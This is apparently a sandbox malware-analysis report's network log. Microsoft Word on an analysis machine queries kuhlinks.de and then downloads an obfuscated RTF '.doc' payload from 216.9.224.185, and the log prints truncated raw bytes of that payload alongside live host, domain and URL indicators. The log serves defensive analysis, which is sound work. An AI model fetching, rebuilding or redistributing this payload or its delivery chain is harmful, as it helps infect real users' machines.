            Apr 2, 2025 12:00:43.908757925 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:43.908766985 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:43.908835888 CEST6084080192.168.2.24216.9.224.185
            Apr 2, 2025 12:00:43.908881903 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:43.908896923 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:43.908910990 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:43.908922911 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:43.908934116 CEST6084080192.168.2.24216.9.224.185
            Apr 2, 2025 12:00:43.908940077 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:43.908946991 CEST6084080192.168.2.24216.9.224.185
            Apr 2, 2025 12:00:43.908955097 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:43.908967972 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:43.908974886 CEST6084080192.168.2.24216.9.224.185
            Apr 2, 2025 12:00:43.908982038 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:43.908997059 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:43.909003019 CEST6084080192.168.2.24216.9.224.185
            Apr 2, 2025 12:00:43.909013033 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:43.909020901 CEST6084080192.168.2.24216.9.224.185
            Apr 2, 2025 12:00:43.909043074 CEST6084080192.168.2.24216.9.224.185
            Apr 2, 2025 12:00:43.909046888 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:43.909061909 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:43.909075975 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:43.909080029 CEST6084080192.168.2.24216.9.224.185
            Apr 2, 2025 12:00:43.909091949 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:43.909105062 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:43.909107924 CEST6084080192.168.2.24216.9.224.185
            Apr 2, 2025 12:00:43.909118891 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:43.909132957 CEST6084080192.168.2.24216.9.224.185
            Apr 2, 2025 12:00:43.909132957 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:43.909149885 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:43.909152031 CEST6084080192.168.2.24216.9.224.185
            Apr 2, 2025 12:00:43.909176111 CEST6084080192.168.2.24216.9.224.185
            Apr 2, 2025 12:00:43.909199953 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:43.909214020 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:43.909245014 CEST6084080192.168.2.24216.9.224.185
            Apr 2, 2025 12:00:43.909293890 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:43.909306049 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:43.909318924 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:43.909322977 CEST6084080192.168.2.24216.9.224.185
            Apr 2, 2025 12:00:43.909332991 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:43.909348965 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:43.909363985 CEST6084080192.168.2.24216.9.224.185
            Apr 2, 2025 12:00:43.909389973 CEST6084080192.168.2.24216.9.224.185
            Apr 2, 2025 12:00:43.909905910 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:43.909985065 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:43.909998894 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:43.910012007 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:43.910021067 CEST6084080192.168.2.24216.9.224.185
            Apr 2, 2025 12:00:43.910037041 CEST6084080192.168.2.24216.9.224.185
            Apr 2, 2025 12:00:43.910121918 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:43.910135031 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:43.910154104 CEST6084080192.168.2.24216.9.224.185
            Apr 2, 2025 12:00:43.910176992 CEST6084080192.168.2.24216.9.224.185
            Apr 2, 2025 12:00:43.910192966 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:43.910206079 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:43.910213947 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:43.910249949 CEST6084080192.168.2.24216.9.224.185
            Apr 2, 2025 12:00:44.154470921 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:44.154526949 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:44.154527903 CEST6084080192.168.2.24216.9.224.185
            Apr 2, 2025 12:00:44.154542923 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:44.154562950 CEST6084080192.168.2.24216.9.224.185
            Apr 2, 2025 12:00:44.154597998 CEST6084080192.168.2.24216.9.224.185
            Apr 2, 2025 12:00:44.179574013 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:44.179590940 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:44.179604053 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:44.179619074 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:44.179629087 CEST6084080192.168.2.24216.9.224.185
            Apr 2, 2025 12:00:44.179666042 CEST6084080192.168.2.24216.9.224.185
            Apr 2, 2025 12:00:44.179743052 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:44.179755926 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:44.179769993 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:44.179779053 CEST6084080192.168.2.24216.9.224.185
            Apr 2, 2025 12:00:44.179811001 CEST6084080192.168.2.24216.9.224.185
            Apr 2, 2025 12:00:44.179925919 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:44.179943085 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:44.179958105 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:44.179960966 CEST6084080192.168.2.24216.9.224.185
            Apr 2, 2025 12:00:44.179975986 CEST6084080192.168.2.24216.9.224.185
            Apr 2, 2025 12:00:44.179996014 CEST6084080192.168.2.24216.9.224.185
            Apr 2, 2025 12:00:44.410861015 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:44.410932064 CEST6084080192.168.2.24216.9.224.185
            Apr 2, 2025 12:00:44.505847931 CEST60843443192.168.2.24172.67.144.140
            Apr 2, 2025 12:00:44.505896091 CEST44360843172.67.144.140192.168.2.24
            Apr 2, 2025 12:00:44.506872892 CEST60843443192.168.2.24172.67.144.140
            Apr 2, 2025 12:00:44.508217096 CEST60843443192.168.2.24172.67.144.140
            Apr 2, 2025 12:00:44.508246899 CEST44360843172.67.144.140192.168.2.24
            Apr 2, 2025 12:00:44.712158918 CEST44360843172.67.144.140192.168.2.24
            Apr 2, 2025 12:00:44.712248087 CEST60843443192.168.2.24172.67.144.140
            Apr 2, 2025 12:00:44.778906107 CEST60843443192.168.2.24172.67.144.140
            Apr 2, 2025 12:00:44.778927088 CEST44360843172.67.144.140192.168.2.24
            Apr 2, 2025 12:00:44.779588938 CEST44360843172.67.144.140192.168.2.24
            Apr 2, 2025 12:00:44.779673100 CEST60843443192.168.2.24172.67.144.140
            Apr 2, 2025 12:00:44.785413980 CEST60843443192.168.2.24172.67.144.140
            Apr 2, 2025 12:00:44.785413980 CEST60843443192.168.2.24172.67.144.140
            Apr 2, 2025 12:00:44.785531044 CEST44360843172.67.144.140192.168.2.24
            Apr 2, 2025 12:00:44.785634995 CEST60843443192.168.2.24172.67.144.140
            Apr 2, 2025 12:00:45.303451061 CEST44360843172.67.144.140192.168.2.24
            Apr 2, 2025 12:00:45.303525925 CEST44360843172.67.144.140192.168.2.24
            Apr 2, 2025 12:00:45.303694963 CEST60843443192.168.2.24172.67.144.140
            Apr 2, 2025 12:00:45.303694963 CEST60843443192.168.2.24172.67.144.140
            Apr 2, 2025 12:00:45.303694963 CEST60843443192.168.2.24172.67.144.140
            Apr 2, 2025 12:00:45.305079937 CEST6084080192.168.2.24216.9.224.185
            Apr 2, 2025 12:00:45.576210976 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:45.576308012 CEST6084080192.168.2.24216.9.224.185
            Apr 2, 2025 12:00:45.605353117 CEST60843443192.168.2.24172.67.144.140
            Apr 2, 2025 12:00:45.605386972 CEST44360843172.67.144.140192.168.2.24
            Apr 2, 2025 12:00:47.109486103 CEST8060836216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:47.109601021 CEST6083680192.168.2.24216.9.224.185
            Apr 2, 2025 12:00:47.111859083 CEST6083680192.168.2.24216.9.224.185
            Apr 2, 2025 12:00:47.377196074 CEST8060836216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:50.606215954 CEST8060840216.9.224.185192.168.2.24
            Apr 2, 2025 12:00:50.606306076 CEST6084080192.168.2.24216.9.224.185
            Apr 2, 2025 12:02:26.088608027 CEST6084080192.168.2.24216.9.224.185
            Apr 2, 2025 12:02:26.708411932 CEST6084080192.168.2.24216.9.224.185
            Apr 2, 2025 12:02:27.817789078 CEST6084080192.168.2.24216.9.224.185
            Apr 2, 2025 12:02:30.036571980 CEST6084080192.168.2.24216.9.224.185
            Apr 2, 2025 12:02:34.458452940 CEST6084080192.168.2.24216.9.224.185
            Apr 2, 2025 12:02:43.286643028 CEST6084080192.168.2.24216.9.224.185
            TimestampSource PortDest PortSource IPDest IP
            Apr 2, 2025 12:00:38.312674999 CEST5268853192.168.2.241.1.1.1
            Apr 2, 2025 12:00:38.558067083 CEST53526881.1.1.1192.168.2.24
            Apr 2, 2025 12:00:44.617645979 CEST5268853192.168.2.241.1.1.1
            Apr 2, 2025 12:00:45.011636972 CEST53526881.1.1.1192.168.2.24
            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Apr 2, 2025 12:00:38.312674999 CEST192.168.2.241.1.1.10x9350Standard query (0)kuhlinks.deA (IP address)IN (0x0001)false
            Apr 2, 2025 12:00:44.617645979 CEST192.168.2.241.1.1.10x86fbStandard query (0)185.224.9.216.in-addr.arpaPTR (Pointer record)IN (0x0001)false
            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Apr 2, 2025 12:00:37.672543049 CEST1.1.1.1192.168.2.240xc9f9No error (0)ecs-office.s-0005.dual-s-msedge.nets-0005.dual-s-msedge.netCNAME (Canonical name)IN (0x0001)false
            Apr 2, 2025 12:00:37.672543049 CEST1.1.1.1192.168.2.240xc9f9No error (0)s-0005.dual-s-msedge.net52.123.129.14A (IP address)IN (0x0001)false
            Apr 2, 2025 12:00:37.672543049 CEST1.1.1.1192.168.2.240xc9f9No error (0)s-0005.dual-s-msedge.net52.123.128.14A (IP address)IN (0x0001)false
            Apr 2, 2025 12:00:38.558067083 CEST1.1.1.1192.168.2.240x9350No error (0)kuhlinks.de172.67.144.140A (IP address)IN (0x0001)false
            Apr 2, 2025 12:00:38.558067083 CEST1.1.1.1192.168.2.240x9350No error (0)kuhlinks.de104.21.47.51A (IP address)IN (0x0001)false
            Apr 2, 2025 12:00:45.011636972 CEST1.1.1.1192.168.2.240x86fbNo error (0)185.224.9.216.in-addr.arpaPTR (Pointer record)IN (0x0001)false
            Apr 2, 2025 12:00:47.287020922 CEST1.1.1.1192.168.2.240x6a7bNo error (0)res-stls-prod.edgesuite.net.globalredir.akadns88.neta726.dscd.akamai.netCNAME (Canonical name)IN (0x0001)false
            Apr 2, 2025 12:00:47.287020922 CEST1.1.1.1192.168.2.240x6a7bNo error (0)a726.dscd.akamai.net23.219.161.152A (IP address)IN (0x0001)false
            • kuhlinks.de
            • 216.9.224.185
            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.2460836216.9.224.185807312C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
            TimestampBytes transferredDirectionData
            Apr 2, 2025 12:00:41.830538034 CEST454OUTHEAD /122/wend/swecaninsertforgoodforeeturncheclkgoodwecan___________wecaninsertforgoodforeeturncheclkgood________wecaninsertforgoodforeeturncheclkgood.doc HTTP/1.1
            Connection: Keep-Alive
            Authorization: Bearer
            User-Agent: Microsoft Office Word 2014
            X-Office-Major-Version: 16
            X-MS-CookieUri-Requested: t
            X-FeatureVersion: 1
            Accept-Auth: badger,Wlid1.1,Bearer,Basic,NTLM,Digest,Kerberos,Negotiate,Nego2
            X-IDCRL_ACCEPTED: t
            Host: 216.9.224.185
            Apr 2, 2025 12:00:42.086951971 CEST323INHTTP/1.1 200 OK
            Date: Wed, 02 Apr 2025 10:00:41 GMT
            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
            Last-Modified: Wed, 02 Apr 2025 05:35:36 GMT
            ETag: "198aa-631c505d8feaa"
            Accept-Ranges: bytes
            Content-Length: 104618
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: application/msword


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            1192.168.2.2460840216.9.224.185807312C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
            TimestampBytes transferredDirectionData
            Apr 2, 2025 12:00:43.166783094 CEST334OUTGET /122/wend/swecaninsertforgoodforeeturncheclkgoodwecan___________wecaninsertforgoodforeeturncheclkgood________wecaninsertforgoodforeeturncheclkgood.doc HTTP/1.1
            Accept: */*
            User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)
            UA-CPU: AMD64
            Accept-Encoding: gzip, deflate
            Connection: Keep-Alive
            Host: 216.9.224.185
            Apr 2, 2025 12:00:43.414607048 CEST1254INHTTP/1.1 200 OK
            Date: Wed, 02 Apr 2025 10:00:43 GMT
            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
            Last-Modified: Wed, 02 Apr 2025 05:35:36 GMT
            ETag: "198aa-631c505d8feaa"
            Accept-Ranges: bytes
            Content-Length: 104618
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: application/msword
            Data Raw: 7b 5c 72 74 66 31 0d 0d 0d 09 09 7b 5c 2a 5c 64 67 6d 4e 6f 64 65 4b 69 6e 64 38 34 34 31 33 39 33 39 32 20 5c 2d 7d 0d 7b 5c 32 39 37 36 35 30 35 31 31 2f 25 2c 3c 36 3e 32 a7 3a 2f 7e 3f 39 b0 7e 39 5f 40 25 2a 39 3d b5 40 24 7c 34 5d 28 31 3c 3a 35 31 28 39 3f 26 27 3f 2e 5b 23 2c 35 34 32 2e 2a 5f 25 25 39 37 7e 3f 3d 2d 2f 35 30 27 35 3f 2c 27 40 2f 24 3c 37 3b 31 30 2f 25 35 40 21 27 3f 40 2f 60 40 3f a7 3d 3f 5e 2b 3d 35 30 7e 3f 5e 3e 2a 23 30 2a 3f 5d 2d 3b 25 3f 5b 27 2f b0 2a 39 38 32 39 5e 25 b0 2f 33 2d b5 33 b0 3f 31 29 26 31 5e 30 28 5e 7c 2f 35 b0 28 b0 3e 5f 28 5d 28 5e 29 3b 40 3c 3f 25 7e 25 26 28 2f 3f 31 b0 2e 3c 37 2c 3f 3e 39 39 3d 3f 21 32 3a 36 25 34 2e 2d 23 5d 3d 7e a7 b0 40 b5 5d 2f 2f 3a b0 2f 3f 5d 24 2a 3b 3d 28 b0 3d 35 2a a7 39 3a 24 5f 5d 32 3c 3c 35 24 38 3c 3b 5e 2b 25 b0 34 3c 3f 3f 33 29 3f 39 21 5d 32 60 3e 2a 33 35 3a 60 40 3a 39 36 2c 3f b5 29 3b 23 3f 33 5f b5 3f 2e 5b 25 31 27 3f 5f 27 a7 25 36 3f 29 25 25 33 34 3f b0 3f 29 3e 3f 60 25 3d 27 28 2f 3f b0 5e [TRUNCATED]
            Data Ascii: {\rtf1{\*\dgmNodeKind844139392 \-}{\297650511/%,<6>2:/~?9~9_@%*9=@$|4](1<:51(9?&'?.[#,542.*_%%97~?=-/50'5?,'@/$<7;10/%5@!'?@/`@?=?^+=50~?^>*#0*?]-;%?['/*9829^%/3-3?1)&1^0(^|/5(>_(](^);@<?%~%&(/?1.<7,?>99=?!2:6%4.-#]=~@]//:/?]$*;=(=5*9:$_]2<<5$8<;^+%4<??3)?9!]2`>*35:`@:96,?);#?3_?.[%1'?_'%6?)%%34??)>?`%='(/?^`#]63;?3%``4?4-;?%,02]`)?`7?[1!92$?-4^('&?%?@;9818[|/?=[5@3.##?,7^#-4></%#?7&!3-?.7>%5`+@*4;5%,@->;'$;7)|~)#*(?~|8(_/??-?@?'79_8?$?=0,^^%4~?0]^|%]|]!=;$2%<8&<.2:1`0?]$?)@9)4.%2)`.<51%$|78?9-39[?=0#[?7:%&*0:?,26?&~@#6[9522=+@,%'8;=829)/?[[?-??&?3(:=_83.1,>`[>[5$7%~)]@]#-,=''42_(!'!%7*'%53+0/??0,?//3*;/3??:0)1<.~!42$1.?)$|>/8=<77+7%='?.1?2!.$%|.94?%]6/#?`3^08*%%%?//#343:]=%0%45$26=4+^%&=~?+:_?#$?+?5@!0<!(?)/5+&*'>2'-`>?@#_;@??.:0;&->>%+06-0)((@&?``$~+?~,<0'=//`$*:?3?~%<%-.?];[5,8.?/??%(%3]*98()649!<%!=7*?[*$#*96?@@?25?&([%%17_[?#'?'!%9@0%,$2^1-?`.[)_&
            Apr 2, 2025 12:00:43.414628983 CEST1254INData Raw: 2b 33 30 b0 2a 3f 3f 3e 40 5e 5e 38 3e 3a 28 2f 5d 2e 3d 3e 36 24 34 b5 29 21 25 27 5b 2a 3a 3e 3f 23 3f 27 5d 32 37 2f 3b 39 a7 3f 3f 60 a7 3f 3d 3f 37 27 30 b0 3f 3e 29 25 23 5d 28 5b 33 3d 33 3f 5f 33 5e 40 b0 b0 2a a7 25 21 30 29 3f 3c a7 b5
            Data Ascii: +30*??>@^^8>:(/].=>6$4)!%'[*:>?#?']27/;9??`?=?7'0?>)%#]([3=3?_3^@*%!0)?<@+<??((=#4<57/@@6:~:$$:1'`=)@?1?7|2$[)1>_2?):|#?9%](?3%_*9]^1?=15?'.&[+/5??:976)|!7%?*;?<]6$>&=?$?.?_-~9@1.2```.?':2;8_*!^8'-+64[:[2?+-?.!)0;0/@[???].'[*
            Apr 2, 2025 12:00:43.414644003 CEST1254INData Raw: 40 3e 3b 5e 5f a7 3d 38 27 3b 3a 5e a7 39 5e 34 3f 23 5e 5f 24 24 3f 29 3a 3f 2f 2e 27 2e 35 5b 25 38 34 3f 5b 3d 7c 29 3f 3f b0 25 33 2e 5b 5f 60 3a 2d 2f 30 2c 24 b0 24 3a 2a 32 35 24 b5 5f 2e 26 28 3a b0 7e 33 2b b0 25 26 3f 26 7e 3c 2c 28 3f
            Data Ascii: @>;^_=8';:^9^4?#^_$$?):?/.'.5[%84?[=|)??%3.[_`:-/0,$$:*25$_.&(:~3+%&?&~<,(?|5]?^;:[~0?0[2?1%`;8@60/-(|^-5.^&?$$;'?/,?>@(%7+8#*,#@*|`97|3<6_?$>2=~^[$%-4?1#4?'?6.?~8|3?):-)!??*~%9$/2,6;]%$|@6-?*7#^(<,,?%3;!#?!*=&'!%?,?+]/5
            Apr 2, 2025 12:00:43.414659023 CEST1254INData Raw: 5e 7e 39 40 36 60 3f 7c 30 35 5f 21 25 3f 2f 3f 3b 33 b0 3a 3a 28 32 31 2d 60 3b 2d 3f 28 35 39 30 24 21 3e 25 3f 2e 38 33 2d 31 39 5d 5b 5b a7 29 24 7e 33 37 2f 34 3f a7 40 5f 38 2b 25 3f b5 24 2a 24 25 3e 34 27 3b 26 2e 2a 5f 60 31 b5 23 3f 5e
            Data Ascii: ^~9@6`?|05_!%?/?;3::(21-`;-?(590$!>%?.83-19][[)$~37/4?@_8+%?$*$%>4';&.*_`1#?^>~`('>95*;%*,~%]+]&_(<086[#;(.=*<|?^.~6|1`?::+^*'6`??&??_,[9$~+7.@#][:'7:0^+>?~/+2;7!#!/&2;(>%:34)?6=2+%+*?33(5+]'5$`9.?+8@]4=%?]/@/%]:^:)8-;-96^;^:
            Apr 2, 2025 12:00:43.414673090 CEST1254INData Raw: 40 2b 34 60 3a 3f 37 3f 5e 24 23 2d 2a 38 38 3b 7e 40 b0 30 29 21 3a 3f 35 a7 25 60 2e 3e b0 5b 2a 2f 33 3f 27 3f 3f b5 2a 33 5f 25 27 5d 3f 5e 5d b5 26 2b 31 60 37 3c 7e 3f 5f 36 33 5b 34 37 36 2f 3b 3c 35 5b 3f 27 3a 31 5d 3f 35 39 3f 7c 2f 25
            Data Ascii: @+4`:?7?^$#-*88;~@0)!:?5%`.>[*/3?'??*3_%']?^]&+1`7<~?_63[476/;<5[?':1]?59?|/%!>018+;<~09:3~?5>?<+-%>-4?2:00;<^38@/,?#=?><.`%71;8+;3]?3-5.??)]%|(3.?;->:16!$%#(^+($']6@91!.4(5)?7(,%?_;~*:_-8<49**_||1`?8*]#94??2?|<_742@/[(|10~%>(5&@,
            Apr 2, 2025 12:00:43.414689064 CEST1254INData Raw: 3f 3c 29 3a 37 3b 2d 25 23 5e a7 3f 60 25 25 36 3a 3f 38 3f 39 7c 24 26 b0 25 5e 35 21 3e 39 32 38 3f 21 31 3f 21 7e 3f 3f 5d 29 5e 34 2e 26 3f 3f 30 3f 2b 3f 29 3f 3e 28 5e 28 33 38 2f 33 32 2d 26 36 60 40 35 38 5f 32 35 25 34 23 b5 3c 28 3f 3f
            Data Ascii: ?<):7;-%#^?`%%6:?8?9|$&%^5!>928?!1?!~??])^4.&??0?+?)?>(^(38/32-&6`@58_25%4#<(??%6'87|-)<7)'@9$$%&7/=|%?:9]):.(=_,37?3@,=3)>?_+21|?/+87`[_6!!9/-:44;7%@??2$5/[]8=7>0^#:%..]]!?#$?0/1%?-]????0,83<?53=??+7?!$?8%(%13_?<*3-:9<5?^+7)$<<2
            Apr 2, 2025 12:00:43.414704084 CEST1254INData Raw: 38 2f 29 b5 b0 5b 2f 3b 3f 3f 37 b0 2a 3b 38 5f 5b 5b 7e 3d 2f 3f 60 34 29 35 3f 38 31 3d 30 5f 3b 3c 3f 29 7c 5f b0 30 27 27 2e 24 2a 2c 40 3c 36 39 2c 3d 29 2c 3e 3a 40 3f 29 26 5f 40 7c 34 7c 24 3c 38 38 37 3f 5d 39 38 40 25 38 5e 38 2d 27 3f
            Data Ascii: 8/)[/;??7*;8_[[~=/?`4)5?81=0_;<?)|_0''.$*,@<69,=),>:@?)&_@|4|$<887?]98@%8^8-'??|<<?~+&)?)??]%:?-?%&(.^5:&8^'4?,'`;&?,+,.-;?&^/9?^(?&??>(140#$';??)-8[0-.=.:8[%;0%?13%8`?'=*-)#'-4<#93*`<-[:0,_8791$30],`<?%+|59,44!?+?.,?-2%'0386
            Apr 2, 2025 12:00:43.414721012 CEST1254INData Raw: 20 32 09 20 09 20 20 09 09 09 09 20 20 20 20 20 09 20 30 0d 0d 0a 0d 0a 0d 0d 0d 0a 0d 0a 0d 0d 0a 0d 0d 0d 0a 0a 0d 0a 0d 30 30 30 09 09 09 09 09 20 20 09 20 20 09 09 20 09 09 20 30 30 20 09 20 20 09 09 20 09 20 20 20 09 09 09 09 20 30 09 09 09
            Data Ascii: 2 0000 00 0 c0000 004b4f635 5
            Apr 2, 2025 12:00:43.414736986 CEST1254INData Raw: 09 20 09 20 20 20 09 09 09 09 20 09 20 09 30 0a 0d 0a 0d 0d 0d 0a 0d 0a 0d 0d 0a 0a 0a 0a 0a 0d 0d 0a 0d 0a 0d 30 0d 0a 0a 0d 0a 0a 0d 0a 0d 0a 0a 0a 0d 0d 0d 0d 0d 0d 0a 0d 0a 0d 33 09 20 09 09 20 20 20 20 09 20 20 09 20 09 20 09 65 09 09 09 09
            Data Ascii: 003 e 000 300fef f090 0 06
            Apr 2, 2025 12:00:43.414753914 CEST1254INData Raw: 0d 66 0a 0d 0d 0d 0a 0a 0d 0d 0d 0d 0d 0a 0d 0d 0a 0d 0d 0a 0a 0d 0a 0d 66 66 66 66 66 66 66 0d 0d 0d 0a 0a 0a 0d 0d 0a 0d 0d 0d 0d 0d 0a 0d 0d 0a 0a 0d 0a 0d 66 09 20 20 09 09 09 20 09 09 09 20 09 09 20 20 20 66 66 09 20 20 09 09 09 20 09 09 09
            Data Ascii: fffffffff ff ff fffff ff ff ff
            Apr 2, 2025 12:00:43.664691925 CEST1254INData Raw: 20 09 20 20 09 09 09 20 20 20 09 09 09 66 09 09 09 20 20 09 20 09 09 09 20 20 20 09 09 09 66 66 0d 0a 0a 0a 0d 0a 0d 0d 0d 0a 0d 0d 0a 0a 0a 0a 0a 0a 0a 0d 0a 0a 66 09 09 09 20 20 09 20 09 09 09 20 20 20 09 09 09 66 66 66 66 0a 0d 0a 0d 0d 0d 0a
            Data Ascii: f fff fffffffff ff f ffffffff
            Apr 2, 2025 12:00:45.305079937 CEST334OUTHEAD /122/wend/swecaninsertforgoodforeeturncheclkgoodwecan___________wecaninsertforgoodforeeturncheclkgood________wecaninsertforgoodforeeturncheclkgood.doc HTTP/1.1
            X-MS-CookieUri-Requested: t
            X-FeatureVersion: 1
            X-IDCRL_ACCEPTED: t
            User-Agent: Microsoft Office Existence Discovery
            Connection: Keep-Alive
            Host: 216.9.224.185
            Apr 2, 2025 12:00:45.576210976 CEST322INHTTP/1.1 200 OK
            Date: Wed, 02 Apr 2025 10:00:45 GMT
            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
            Last-Modified: Wed, 02 Apr 2025 05:35:36 GMT
            ETag: "198aa-631c505d8feaa"
            Accept-Ranges: bytes
            Content-Length: 104618
            Keep-Alive: timeout=5, max=99
            Connection: Keep-Alive
            Content-Type: application/msword


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.2460832172.67.144.1404437312C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
            TimestampBytes transferredDirectionData
            2025-04-02 10:00:39 UTC324OUTOPTIONS / HTTP/1.1
            Connection: Keep-Alive
            Authorization: Bearer
            User-Agent: Microsoft Office Word 2014
            X-Office-Major-Version: 16
            X-MS-CookieUri-Requested: t
            X-FeatureVersion: 1
            Accept-Auth: badger,Wlid1.1,Bearer,Basic,NTLM,Digest,Kerberos,Negotiate,Nego2
            X-MSGETWEBURL: t
            X-IDCRL_ACCEPTED: t
            Host: kuhlinks.de
            2025-04-02 10:00:39 UTC1021INHTTP/1.1 200 OK
            Date: Wed, 02 Apr 2025 10:00:39 GMT
            Content-Type: text/html; charset=utf-8
            Transfer-Encoding: chunked
            Connection: close
            Cf-Ray: 929f7afd6a2eb2c0-EWR
            Server: cloudflare
            Allow: GET,HEAD
            Strict-Transport-Security: max-age=15552000; includeSubDomains
            X-Content-Type-Options: nosniff
            X-Dns-Prefetch-Control: off
            X-Download-Options: noopen
            X-Frame-Options: SAMEORIGIN
            X-Xss-Protection: 1; mode=block
            Cf-Cache-Status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IJWlFlQPdb9ELvMhM6flFdOdNcTSnw01udc1T2puqczOsLlmMEr7BfAb5KY6fwk%2FzoRleTyJ%2FM8e8bnfs8ncyT8FyKDz63PL1zqQpOObncI27mbpK8QzAtUN%2BCjd0w%3D%3D"}],"group":"cf-nel","max_age":604800}
            Nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            alt-svc: h3=":443"; ma=86400
            server-timing: cfL4;desc="?proto=TCP&rtt=111968&min_rtt=99158&rtt_var=34397&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2826&recv_bytes=938&delivery_rate=37553&cwnd=232&unsent_bytes=0&cid=3be4d5f1ebddf068&ts=591&x=0"
            2025-04-02 10:00:39 UTC13INData Raw: 38 0d 0a 47 45 54 2c 48 45 41 44 0d 0a
            Data Ascii: 8GET,HEAD
            2025-04-02 10:00:39 UTC5INData Raw: 30 0d 0a 0d 0a
            Data Ascii: 0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            1192.168.2.2460833172.67.144.1404437312C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
            TimestampBytes transferredDirectionData
            2025-04-02 10:00:39 UTC227OUTOPTIONS / HTTP/1.1
            Authorization: Bearer
            X-MS-CookieUri-Requested: t
            X-FeatureVersion: 1
            X-IDCRL_ACCEPTED: t
            User-Agent: Microsoft Office Protocol Discovery
            Host: kuhlinks.de
            Content-Length: 0
            Connection: Keep-Alive
            2025-04-02 10:00:40 UTC1020INHTTP/1.1 200 OK
            Date: Wed, 02 Apr 2025 10:00:40 GMT
            Content-Type: text/html; charset=utf-8
            Transfer-Encoding: chunked
            Connection: close
            Cf-Ray: 929f7b031e81377d-EWR
            Server: cloudflare
            Allow: GET,HEAD
            Strict-Transport-Security: max-age=15552000; includeSubDomains
            X-Content-Type-Options: nosniff
            X-Dns-Prefetch-Control: off
            X-Download-Options: noopen
            X-Frame-Options: SAMEORIGIN
            X-Xss-Protection: 1; mode=block
            Cf-Cache-Status: DYNAMIC
